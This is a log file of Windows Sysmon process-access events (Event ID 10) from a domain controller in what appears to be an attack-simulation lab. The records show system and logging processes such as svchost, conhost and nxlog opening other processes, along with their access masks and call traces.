{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10EA-5F25-0000-00109C340500}\r\nTargetProcessId: 2424\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10EA-5F25-0000-00109C340500}","TargetProcessId":"2424","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.376\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.376","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.580\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.580","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.580\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.580","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
